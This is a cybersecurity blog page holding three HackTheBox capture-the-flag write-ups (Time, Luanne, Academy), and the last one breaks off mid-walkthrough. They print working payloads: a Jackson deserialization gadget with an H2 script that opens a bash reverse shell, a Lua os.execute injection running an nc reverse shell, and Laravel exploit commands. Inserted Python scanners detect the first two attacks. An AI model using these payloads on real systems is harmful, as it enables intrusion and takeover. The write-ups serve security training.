qwertty - cyber security blog
qwertty is a blog for writeups and tutorials related to cyber security.
https://qwertty.info/

[HTB] Time - Writeup
https://qwertty.info/blog/htb-time-writeup
2021-04-06T08:00:00+02:00

Preface: Time is a medium box on HackTheBox.eu. With a basic nmap scan we discover two ports. On port 80, http, we find a JSON beautifier and validator. The validation option looks like a beta version, and we are able to find a vulnerability in it that lets us execute arbitrary code. Once we are on the box we find a bash script which is owned by our user. This script is scheduled and is executed with root privileges. We drop our ssh key into the authorized_keys file of the user root and are able to log in as root.

[Image: Hack the box infocard time]

Information Gathering

As always we start with an nmap scan for open ports and services:

$ nmap -sV -sC -oA nmap/time 10.10.10.214
# Nmap 7.91 scan initiated Tue Nov  3 07:10:55 2020 as: nmap -sV -sC -oA nmap/time 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.10s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov  3 07:11:17 2020 -- 1 IP address (1 host up) scanned in 21.72 seconds

We got two open ports. The interesting one for us is port 80, http. Nmap tells us that there is a JSON parser, so let's see what we can do there.

[Image: htb-time-port-80]

There are two options: one to beautify and one to validate a JSON string. The second option says that it is a beta. Maybe we can find a vulnerability in it. I try a simple string to check whether the validate function works, but an unhandled error message occurs.

[Image: htb-time-validate-error]

I extracted the error: Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'qwertty': was expecting ('true', 'false' or 'null')

The error message tells us there is a Java application in the background using the FasterXML (Jackson) library. A quick search with searchsploit gives us nothing, so let's try Google. After some research I found this link, which is related to CVE-2019-12384.

User

CVE-2019-12384

CVE-2019-12384 is a jackson-databind bug: the library fails to block the logback-core class from polymorphic deserialization. Depending on the content, remote code execution is possible. So this is what we were looking for.

As described in the link we need an inject.sql. We use the one from the link, but I changed the payload to create a reverse shell.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.14/4444 0>&1')

As always I start a Python HTTP server and my nc listener to catch the reverse shell. The last step for this CVE is the payload for the validator beta. I also use the JSON payload from the link above, but I changed localhost to my IP.

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.14:8000/inject.sql'"}]

[Image: htb-time-validate-payload]

Now it is time to check the nc listener:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.214] 39252
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ whoami && hostname
whoami && hostname
pericles
time

Yes! We caught the reverse shell!

SHELL: pericles
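A defensive counterpart to the payload used above, added here and not part of the original post: a small Python scanner that flags request bodies carrying Jackson's polymorphic type-wrapper shape (a two-element array whose first element is a Java class name), the logback-core gadget class named in this writeup, and JDBC URLs that carry INIT=RUNSCRIPT. It assumes the validator's request bodies are available to the scanner (for example at a reverse proxy); the sample bodies are constructed, with the attacker host replaced by a placeholder.

```python
import json
import re
from typing import Any, Dict, List

# Jackson's default typing (As.WRAPPER_ARRAY) serialises a polymorphic value as
# ["fully.qualified.ClassName", {...}]. CVE-2019-12384 abuses that shape with the
# logback-core DriverManagerConnectionSource gadget: its "url" property is handed
# to JDBC, and the H2 driver honours INIT=RUNSCRIPT FROM '<url>' in that string.
JAVA_CLASS_RE = re.compile(r"^(?:[a-z_][a-z0-9_]*\.){2,}[A-Z][A-Za-z0-9_$]*$")
JDBC_INIT_RE = re.compile(r"INIT\s*=\s*RUNSCRIPT\s+FROM", re.IGNORECASE)

# Gadget class seen in this writeup; a deployment would extend the set with the
# classes listed in the jackson-databind advisories for its own dependencies.
KNOWN_GADGET_CLASSES = {
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
}

# Constructed sample bodies: one benign request, one with the shape of the
# payload above (attacker host replaced by a placeholder), one plain string.
SAMPLE_BODIES: Dict[str, str] = {
    "benign": '{"name": "qwertty", "tags": ["json", "beautify"]}',
    "gadget": (
        '["ch.qos.logback.core.db.DriverManagerConnectionSource", '
        '{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
        "INIT=RUNSCRIPT FROM 'http://EXAMPLE_HOST:8000/inject.sql'\"}]"
    ),
    "not_json": "qwertty",
}


def _walk(node: Any, findings: List[str], path: str = "$") -> None:
    """Recursively collect suspicious constructs, recording a JSONPath-like location."""
    if isinstance(node, list):
        if len(node) == 2 and isinstance(node[0], str) and JAVA_CLASS_RE.match(node[0]):
            cls = node[0]
            if cls in KNOWN_GADGET_CLASSES:
                findings.append(f"{path}: known gadget class {cls}")
            else:
                findings.append(f"{path}: polymorphic type wrapper for {cls}")
        for i, item in enumerate(node):
            _walk(item, findings, f"{path}[{i}]")
    elif isinstance(node, dict):
        for key, value in node.items():
            if isinstance(value, str) and value.lower().startswith("jdbc:"):
                if JDBC_INIT_RE.search(value):
                    findings.append(f"{path}.{key}: JDBC URL runs a remote script (INIT=RUNSCRIPT)")
            _walk(value, findings, f"{path}.{key}")


def scan_json_body(body: str) -> List[str]:
    """Return findings for one request body; an empty list means nothing suspicious."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []  # not JSON: Jackson rejects it before any type resolution happens
    findings: List[str] = []
    _walk(doc, findings)
    return findings


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, scan_json_body(body) or "clean")
```

The structural check (any `["class.Name", {...}]` wrapper) is deliberately broader than the single gadget, since the fix for this class of bug is to disable default typing or allowlist types, not to block one class name.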

Root

As always we start with LinPEAS on the box. I found an odd file called timer_backup.sh which is owned by our user.

[+] .sh files in path
/usr/bin/gettext.sh
You own the script: /usr/bin/timer_backup.sh
/usr/bin/rescan-scsi-bus.sh

Let's see what this bash script is doing:

$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

Okay, the script creates a backup of /var/www/html and moves it to the /root home directory. This indicates that we have write access to the /root directory. So we could drop an ssh key into authorized_keys and then log in as root.

First we have to create a new ssh key.

$ ssh-keygen -f ~/htb/boxes/time/id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/qwertty/htb/boxes/time/id_rsa
Your public key has been saved in /home/qwertty/htb/boxes/time/id_rsa.pub
The key fingerprint is:
SHA256:Sa5EbkKsmU4t6ZYUYHxdMAqw035n0R1A57kbglEMKV4 qwertty@eagle

Now we can add the following line to timer_backup.sh:

echo "<SSH_PUB_KEY>" >> /root/.ssh/authorized_keys

Last but not least we check whether we can log in as root:

$ ssh -i id_rsa root@10.10.10.214
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)

Last login: Tue Apr  6 05:58:43 2021 from 10.10.14.14
root@time:~# whoami && hostname
root
time

Yes, we gained root access.

SHELL: root


Thanks for reading! I hope you enjoyed it!

[HTB] Luanne - Writeup
https://qwertty.info/blog/htb-luanne-writeup
2021-03-23T07:00:00+01:00

Preface: Luanne is an easy box on HackTheBox.eu. With a basic nmap scan we discover two http ports. Both are restricted with an .htaccess file, but on port 80 there is a robots.txt file which reveals a subdirectory to us. In this subdirectory we find another directory with gobuster. There we see a JSON response controlled by a GET parameter. With the help of this GET parameter we are able to run arbitrary code through an SQLi attack. Once on the box we find a process owned by the user. With the process we are able to obtain the private ssh key of the user. Within the user's home directory we find a .tar.gz.enc archive which we have to decrypt and then unpack. The archive contains a hash which we are able to crack. With the cracked password we are able to spawn a root shell.

[Image: Hack the box infocard luanne]

Information Gathering

As always we start with an nmap scan for open ports and services:

$ cat nmap/luanne.nmap 
# Nmap 7.91 scan initiated Sat Dec  5 22:43:19 2020 as: nmap -sV -sC -oA nmap/luanne 10.10.10.218
Nmap scan report for 10.10.10.218
Host is up (0.10s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-robots.txt: 1 disallowed entry 
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  5 22:46:42 2020 -- 1 IP address (1 host up) scanned in 203.24 seconds

We got three open ports. On port 9001 it looks like we need credentials, because the output tells us 401 Unauthorized. Port 80 gives a similar output but reveals a subdirectory called weather to us: it is a disallowed entry in robots.txt.

Gobuster

Before we take a look in the browser, let's start a gobuster on the subdirectory weather. I like to have some enumeration running in the background.

$ gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Now it is time to open http://10.10.10.218 in the browser. But as we assumed earlier, it is protected by .htaccess: we have to enter a username and a password.

[Image: Hack the box luanne ip htaccess]

I tried some standard credentials without success. The web server always responds with the 401 Unauthorized message.

[Image: Hack the box luanne ip browser]

On port 9001 we have the same behavior. It is also protected by an .htaccess file. None of the standard credentials I tried worked; I always got the "Error response" page with the code 401 Unauthorized.

[Image: Hack the box luanne ip port 9001]

Let's see if gobuster found something interesting for us.

$ gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.218/weather/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/04 01:40:43 Starting gobuster
===============================================================
/forecast (Status: 200)
===============================================================
2020/12/04 01:50:23 Finished
===============================================================

Indeed we found another subdirectory called forecast. The most interesting part is the response code 200. This means we can access this subdirectory without providing credentials.

Let's have a look at what the /forecast directory has for us. But be careful: we ran gobuster on the /weather subdirectory, so the link we have to open is http://10.10.10.218/weather/forecast.

[Image: Hack the box luanne ip weather forecast]

We got a JSON response. Firefox automatically renders the result in a pretty UI. The message of the response gives us an important hint: No city specified. Use 'city=list' to list available cities.

There is a GET parameter city where we can provide some data. Let's see what the suggested list reveals to us.

[Image: Hack the box luanne forecast city list]

Only a bunch of cities. Nothing interesting for us. But my experience says that this could be vulnerable to a SQL injection. First we should try to break the response. To do that I use cURL in my terminal. I always try the following characters first to break the query: ', " and ;. Let's see if we can cause an error message.

$ curl -s http://10.10.10.218/weather/forecast?city=%27;
<br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value

Nice, we got an error message by providing the characters ';. Now we know that the application runs Lua.

Foothold

We know that the application runs Lua. So we should first try whether we can execute some code, to avoid running into a rabbit hole. After a quick Google search I found a useful link on GTFOBins. With os.execute() we can run OS commands. Now it is time to prove it.

$ curl -s 'http://10.10.10.218/weather/forecast?city=%27);os.execute(%22id%22);--'
{"code": 500,"error": "unknown city: uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)

Yes! We got remote code execution as _httpd! Next I check which OS is running on this box.

$ curl -s 'http://10.10.10.218/weather/forecast?city=%27);os.execute(%22uname%20-a%22);--'
{"code": 500,"error": "unknown city: NetBSD luanne.htb 9.0 NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020  mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/amd64/compile/GENERIC amd64

NetBSD is running. So we create a reverse shell with a basic sh and mkfifo, because bash is not always available on NetBSD. First start our nc listener as always.

$ nc -lvnp 4444
listening on [any] 4444 ...

Now it is time to pop our reverse shell.

$ curl -s 'http://10.10.10.218/weather/forecast?city=%27);os.execute(%22rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.3%204444%20%3E/tmp/f%22);--'

Let's check our nc listener:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.218] 65495
sh: can't access tty; job control turned off
$ whoami
_httpd
$ hostname
luanne.htb

Awesome! We got a shell.

SHELL: _httpd
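A defender's view of the requests above, added here and not part of the original post: a Python scanner over web-server access-log lines that URL-decodes each query parameter and flags Lua sinks such as os.execute, the quote-and-close sequence used to break out of a string literal, and a quote character that was answered with an HTTP 500. The log lines are constructed in the common log format and the heuristics are my own, not anything taken from the box.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format). The first two carry the
# probe and the os.execute() injection shown above; the third is a normal request.
SAMPLE_ACCESS_LOG = [
    '10.10.14.3 - - [05/Dec/2020:22:50:01 +0000] "GET /weather/forecast?city=%27; HTTP/1.1" 500 71',
    '10.10.14.3 - - [05/Dec/2020:22:51:13 +0000] "GET /weather/forecast?city=%27);os.execute(%22id%22);-- HTTP/1.1" 500 92',
    '10.10.14.9 - - [05/Dec/2020:22:52:40 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 1402',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Lua functions that reach the OS or evaluate code, plus the quote-close-semicolon
# sequence an injection uses to terminate the string literal it lands in.
LUA_SINKS = ("os.execute", "io.popen", "loadstring", "load(", "dofile", "require(")
BREAKOUT_RE = re.compile(r"""['"]\s*\)\s*;""")


def parse_query(target: str) -> List[Tuple[str, str]]:
    """Split the query string of a request target into decoded (name, value) pairs.
    Done by hand so that ';' inside a value is never treated as a separator."""
    _, _, query = target.partition("?")
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_request(target: str, status: int) -> List[str]:
    """Return the reasons a request looks like Lua code injection ([] if clean)."""
    reasons = []
    for name, value in parse_query(target):
        for sink in LUA_SINKS:
            if sink in value:
                reasons.append(f"{name}: calls {sink}")
        if BREAKOUT_RE.search(value):
            reasons.append(f"{name}: closes a string literal and statement")
        if value.rstrip().endswith("--"):
            reasons.append(f"{name}: trailing Lua comment swallows the rest of the line")
        if status >= 500 and any(q in value for q in "'\""):
            reasons.append(f"{name}: quote character answered with HTTP {status} (injection probe)")
    return reasons


def scan_access_log(lines: List[str]) -> List[str]:
    """One alert line per suspicious request; unparsable lines are skipped."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"), int(m.group("status")))
        if reasons:
            alerts.append(f"{m.group('ip')} [{m.group('ts')}] {m.group('target')}: " + "; ".join(reasons))
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_ACCESS_LOG):
        print(alert)
```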

User

Now it is time to gather information on the host. My first thought was: there has to be a .htaccess file in the /var/www directory which leaks some credentials.

$ pwd
/var/www
$ ls -la
total 20
drwxr-xr-x   2 root  wheel  512 Nov 25 11:27 .
drwxr-xr-x  24 root  wheel  512 Nov 24 09:55 ..
-rw-r--r--   1 root  wheel   47 Sep 16  2020 .htpasswd
-rw-r--r--   1 root  wheel  386 Sep 17  2020 index.html
-rw-r--r--   1 root  wheel   78 Nov 25 11:38 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

We did not find the .htaccess file, but a .htpasswd file which contains some credentials. Now it is time to try whether we can crack the hash of the user webapi_user.

John

I use john to crack the hash. First I created a file called hashes which contains the actual hash. As wordlist I use rockyou.txt. Now it is time to run john.

$ john hashes -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iamthebest       (?)
1g 0:00:00:00 DONE (2021-03-24 07:57) 20.00g/s 61440p/s 61440c/s 61440C/s secrets..ANTHONY
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Nice! We cracked the hash. Now we have the credentials webapi_user:iamthebest.

At the beginning of our enumeration we discovered that ports 80 and 9001 are protected by an .htaccess file. Let's try these credentials on both ports.

They worked on port 80, but we didn't get anything new.

[Image: Hack the box luanne ip creds browser]

On port 9001 the credentials do not work. So we have to enumerate further on the box.

LinPEAS

As always I first try linpeas.sh on the box to see if there is something interesting. One process caught my attention; it looks pretty odd.

================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
# ...
r.michaels  185  0.0  0.0  34992  1972 ?     Is    7:09PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www
# ...

It is the httpd process running on localhost, owned by r.michaels, with a bunch of arguments and flags. Before we invest more time in this process we should check whether we are able to get responses from the httpd daemon.

$ curl -s localhost:3001
<html><head><title>401 Unauthorized</title></head>
<body><h1>401 Unauthorized</h1>
/: <pre>No authorization</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>

The same result as on port 80: 401 Unauthorized. Maybe the credentials we cracked with john work here as well.

$ curl -s --user webapi_user:iamthebest localhost:3001
<!doctype html>
<html>
  <head>
    <title>Index</title>
  </head>
  <body>
    <p><h3>Weather Forecast API</h3></p>
    <p><h4>List available cities:</h4></p>
    <a href="/weather/forecast?city=list">/weather/forecast?city=list</a>
    <p><h4>Five day forecast (London)</h4></p>
    <a href="/weather/forecast?city=London">/weather/forecast?city=London</a>
    <hr>
  </body>
</html>

Yes, now we get a proper response. But it looks the same as on port 80. I think this is the development instance of r.michaels. The process is running from the home directory of r.michaels. Maybe we can use this fact to our advantage.

After some Google searches I found something interesting in the official Apache documentation.

On systems with multiple users, each user can be permitted to have a web site in their home directory using the UserDir directive. Visitors to a URL http://example.com/~username/ will get content out of the home directory of the user "username", out of the subdirectory specified by the UserDir directive.

This means we can access files from the home directory of the user r.michaels with a cURL request. Maybe we can get a directory listing.

$ curl -s --user webapi_user:iamthebest localhost:3001/~r.michaels/
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
        border-top: 1px solid black;
        border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>

Indeed, we are able to see what is in the directory. There is just one file: id_rsa. I think this is the private key of r.michaels. Maybe we are able to get the content of id_rsa by requesting it. I give it a try.

$ curl -s --user webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[private key omitted]
-----END OPENSSH PRIVATE KEY-----

Oh yeah, there it is! I try to ssh into the box with the key.

$ ssh -i id_rsa r.michaels@10.10.10.218
Last login: Thu Mar 25 20:06:43 2021 from 10.10.14.11
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ whoami && hostname
r.michaels
luanne.htb

Nice! We are on the box as r.michaels.

SHELL: r.michaels

Root

First let's take a look whether there is something interesting in our home directory. After some poking around I found the archive ~/backups/devel_backup-2020-09-16.tar.gz.enc. So let's try whether we can extract the archive.

After some research I found out that this .tar archive is encrypted with a private key. On NetBSD this is possible with netpgp. So I guess we have to decrypt it locally on the machine. Let's try it.

luanne$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc > /tmp/backup.tar.gz
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a
uid              RSA 2048-bit key <r.michaels@localhost>
luanne$ cd /tmp
luanne$ ls
backup.tar.gz

Nice! We decrypted the .tar archive. Now let's unpack it.

luanne$ tar -xvf backup.tar.gz
x devel-2020-09-16/
x devel-2020-09-16/www/
x devel-2020-09-16/webapi/
x devel-2020-09-16/webapi/weather.lua
x devel-2020-09-16/www/index.html
x devel-2020-09-16/www/.htpasswd

The first file which caught my attention is the .htpasswd file. The other files should not be very interesting for us. Let's check the content of .htpasswd.

luanne$ cd devel-2020-09-16/www/
luanne$ cat .htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

Another password hash. It is time for john again. I append the new hash to my existing hashes file and run the same command again.

$ john hashes -w=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Remaining 1 password hash
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littlebear       (?)
1g 0:00:00:00 DONE (2021-03-25 21:14) 5.555g/s 72533p/s 72533c/s 72533C/s tormenta..hello11
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Nice! We got the password littlebear. When I am on a target machine I always try newly discovered passwords to switch to root.

luanne$ su
su: You are not listed in the correct secondary group (wheel) to su root.
su: Sorry: Authentication error
luanne$ sudo /bin/sh
ksh: sudo: not found

Okay, neither su nor sudo works; sudo is not even installed on this NetBSD system. Let's see what the equivalent of sudo on NetBSD is. In a quick Google search I found this useful link. They suggest using doas instead of sudo. I had never used doas before, so I checked the man page of doas.

-u user Execute the command as user. The default is root.

The default user is root. So we can just try to run doas /bin/sh to spawn a root shell with the password littlebear.

luanne$ doas /bin/sh
Password:
# whoami 
root
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)

Oh yes! doas with the cracked password worked! We gained a root shell!

SHELL: root


Thanks for reading! I hope you enjoyed it!

[HTB] Academy - Writeup
https://qwertty.info/blog/htb-academy-writeup
2020-12-30T08:20:00+01:00

Preface: Academy is an easy box on HackTheBox.eu. We find a registration form on port 80, where we intercept the registration request to gain more administrative privileges. Next we discover a subdomain which seems to be a development page. After some enumeration we can use some of this information to gain a reverse shell. Through some environment files we get credentials to gain a privileged shell. With further enumeration we find more credentials for another user. This user has sudo rights for one specific binary, which we use for privilege escalation.

[Image: Hack the box infocard academy]

Information gathering

As always we start with an nmap scan for open ports and services:

$ nmap -sV -sC -oA nmap/academy 10.10.10.215
# Nmap 7.91 scan initiated Sat Nov  7 23:23:54 2020 as: nmap -sV -sC -oA nmap/academy 10.10.10.215
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.10s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  7 23:24:16 2020 -- 1 IP address (1 host up) scanned in 22.20 seconds

We got http on port 80 and ssh on port 22. On port 80 it looks like there is an Academy site. Let's take a look in the browser. We are redirected to academy.htb, so we have to add this vhost to our /etc/hosts file. Now we can visit the page. We only have two options: Login or Register.

Before we start to poke around on the Register form, we start a gobuster. It is always good to have some enumeration running in the background.

$ gobuster dir -u http://10.10.10.215 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:                   http://10.10.10.215
[+] Threads:          10
[+] Wordlist:           /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:      gobuster/3.0.1
[+] Extensions:      php
[+] Timeout:          10s
===============================================================
2021/11/10 08:53:45 Starting gobuster
===============================================================
...

Now I take a closer look at the Register form. In the page source I found something interesting:

<input type="hidden" value="0" name="roleid" />

The form contains a hidden input with the name roleid. I would guess that if we change the value we gain more privileges.

But before we try to change the value, let's take a look at the result of our gobuster:

/index.php (Status: 200)
/login.php (Status: 200)
/register.php (Status: 200)
/admin.php (Status: 200)
/config.php (Status: 200)
/home.php (Status: 302)

admin.php looks interesting. I think we can gain more information from it.

First I create a normal user without changing the roleid value, to check whether we can access admin.php. We can't: we get the login form. So let's try to increment the value by one with Burp.

[Image: Academy burp roleid]

After sending the request, we got a 302 Found response. Let's log in at http://academy.htb/admin.php. My thought is confirmed: we found some useful information.

[Image: Academy admin.php planner]

We found two things which are interesting for us:

  • Potential usernames: cry0l1t3 and mrb3n
  • One subdomain: dev-staging-01.academy.htb

The state of dev-staging-01.academy.htb is still pending. I think we should take a look at that first. But first we have to add the subdomain to our /etc/hosts file.

[Image: Academy subdomain dev-staging.academy.htb laravel]

The error message tells us that we are dealing with a Laravel application:

The stream or file "/var/www/html/htb-academy-dev-01/storage/logs/laravel.log" could not be opened in append mode: failed to open stream: Permission denied

Foothold

After some enumeration on Laravel I found CVE-2018-15133. I think this is the one we need. For this vulnerability we need the APP_KEY, which we can find on the subdomain: the app is leaking it because of the error and the development settings. I searched for a PoC and found one: https://github.com/aljavier/exploit_laravel_cve-2018-15133.

$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c whoami
www-data

So we got RCE. It's time for a reverse shell :) As usual I start my listener: nc -lvnp 4444.

Now we exploit the Laravel app:

$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.**.** 4444 >/tmp/f"

And boom, we got the shell:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.14.4] 43854
Running in interactive mode. Press CTRL+C to exit.
$ whoami
www-data

$ uname -a
Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

SHELL: www-data

User

I think we can find some credentials in the .env file of the Laravel installation. Maybe they are using a database.

$ pwd
/var/www/html/academy
$ cat .env
...
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...

So there we go. Let's take a look into the /home directory, because dev is not a valid username.

$ ls /home
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n

We got a bunch of users. But on the http://academy.htb/admin.php page we got two usernames. Let's try these first.

$ ssh cry0l1t3@10.10.10.215
cry0l1t3@10.10.10.215's password: 

$ whoami
cry0l1t3

SHELL: cry0l1t3

Root

During the basic checks as my user I discovered that we are a member of the adm group. That implies we can read a bunch of .log files.

After some enumeration I discovered a logged entry of the su command:

$ pwd
